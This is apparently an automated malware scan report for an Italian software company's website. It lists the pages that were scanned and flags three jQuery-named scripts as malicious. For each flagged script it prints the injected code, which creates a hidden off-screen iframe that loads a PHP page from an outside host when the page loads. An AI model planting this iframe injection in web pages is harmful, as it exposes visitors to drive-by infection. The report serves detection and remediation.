Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=buildsoft.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://buildsoft.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 05:39:45 GMT Location: http://www.buildsoft.it/ Server: Apache Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.buildsoft.it/ | 200 OK Content-Length: 27069 Content-Type: text/html | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://buildsoft.it/jquery.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 05:39:46 GMT Location: http://www.buildsoft.it/jquery.js Server: Apache Content-Length: 241 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.buildsoft.it/jquery.js | 200 OK Content-Length: 31439 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://www.stefanocalo.it/J_1.5.22/c.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://buildsoft.it/jquery.vticker-min.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 05:39:47 GMT Location: http://www.buildsoft.it/jquery.vticker-min.js Server: Apache Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.buildsoft.it/jquery.vticker-min.js | 200 OK Content-Length: 2342 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://www.stefanocalo.it/J_1.5.22/c.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://buildsoft.it/bizproperty.aspx | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 05:39:47 GMT Location: http://www.buildsoft.it/bizproperty.aspx Server: Apache Content-Length: 248 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.buildsoft.it/bizproperty.aspx | 200 OK Content-Length: 24614 Content-Type: text/html | clean |
http://www.buildsoft.it/bizproperty_funzionalita.aspx | 200 OK Content-Length: 27247 Content-Type: text/html | clean |
http://www.buildsoft.it/jquery.ad-gallery.js | 200 OK Content-Length: 30813 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function frmAdd() { var ifrm = document.createElement('iframe'); ifrm.style.position='absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://www.stefanocalo.it/J_1.5.22/c.php"; ifrm.id = 'frmId'; document.body.appendChild(ifrm); }; window.onload = frmAdd; Antivirus reports:
| ||
http://www.buildsoft.it/contatti.aspx | 200 OK Content-Length: 47935 Content-Type: text/html | clean |
http://www.buildsoft.it/WebResource.axd?d=cd4it_Y0f-GJ8wBftMq8li6y7KpWePOFaK7h4QC4SNSUpXnoARwRICE5-9V_IXIgiGuwDJoKNRRxM1zpfMXpOCgRuNQ1&t=635513733231987607 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://www.buildsoft.it/WebResource.axd?d=ghZUYGJtJVAVyzV4BDvsl8QO8xivJs-J4dms8S8QLAxrmpAr8Pl8BRx6deQqsUBHHT9Q9wLQuAqh3j_-w1aesFmGN-s1&t=635513733231987607 | 200 OK Content-Length: 21547 Content-Type: application/x-javascript | clean |
http://www.buildsoft.it/viewmanager.aspx | 200 OK Content-Length: 20967 Content-Type: text/html | clean |
http://www.buildsoft.it/prodotti/View%20Manager%202011%20(1.0.0.1).zip | 200 OK Content-Length: 300747 Content-Type: application/x-zip-compressed | clean |
http://www.buildsoft.it/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.buildsoft.it/viewmanager_registra.aspx | 200 OK Content-Length: 47122 Content-Type: text/html | clean |
http://www.buildsoft.it/index.aspx | 200 OK Content-Length: 27069 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: buildsoft.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 05:39:45 GMT
Location: http://www.buildsoft.it/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
GET / HTTP/1.1
Host: buildsoft.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 05:39:45 GMT
Location: http://www.buildsoft.it/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: buildsoft.it
Referer: http://www.google.com/search?q=buildsoft.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: buildsoft.it
Referer: http://www.google.com/search?q=buildsoft.it
Result:
The result is similar to the first query. There are no suspicious redirects found.